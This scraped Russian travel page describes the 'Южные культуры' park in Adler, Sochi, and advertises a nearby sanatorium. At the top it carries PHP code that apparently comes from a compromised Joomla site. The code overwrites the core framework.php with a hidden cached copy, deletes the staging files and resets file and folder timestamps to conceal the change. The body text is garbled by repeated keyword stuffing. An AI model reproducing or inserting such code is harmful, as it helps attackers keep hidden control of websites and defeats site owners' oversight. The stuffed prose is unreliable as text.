$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } парк Южные культуры

Туры в рассрочку

Туры в рассрочку!!! Подробнее


парк Южные культуры
парк Южные культурыСанаторий Южное взморье находиться в Адлерском районе городапарк Южные культуры Сочи. Здесь царит мягкий микроклимат. Благодаря близости моря от центра района, здесь более влажно, чем в самом Сочи, что дает несомненное преимущество местной флоре.

Гости, которые приезжают на отдых и лечение в Cанаторий Южное взморье, каждый раз наслаждаются цветным убранствлм территории и буйной зеленью, которая радует глаз в любое время года. Но, помимо, территории, гости могут насладиться растительностью всего города, так как он утопает в зелени пальм, кипарисов, магнолий, алеандров, мандариновых, гранатовых деревье, фейхоа и т.д. Самым привлекательным парком в Адлере является парк Южные культуры, где произрастают удивительные растения, например квадратный бамбук, аналога нет на всей территории Большого Сочи.

парк Южные культурыВ который раз удивляешься , сколь щедра природа! Если вы решите парк Южные культурыотправиться в ознакомительное путешествие по парку Южные культуры, то сразу же от ворот вас встретит аллея китайских веерных пальм. Сразу за ней расположена смотровая площадка, с которой открываются потрясающие виды. Впереди полоска синего моря, по левую руку Имеретинская долина, справа поселок Адлер, а внизу у подножия холма, на котором расположена эта смотровая, до самого моря огромная территория парка.

Он кажется значительно больше, чем есть на самом деле и в этом заключается один из секретов его планировки. В десяти метрах от смотровой площадки растет на редкость стройное, изящное дерево. Его ветви грациозно изогнуты и покрыты черепитчатой хвоей. Это араукария чилийская, которую на родине называют хлебным деревом.

Парк находиться всего в 10 минутах езды от Санатория Южное взморье. Каждый гость может без проблем добраться да парка. Конечно, же парк могут посещать не только туристы, отдыхающие в санатории Южное взморье, но и все гости Сочи и Адлера.
 

Открытый Юг (2015-2016)

Погода

@Mail.ru .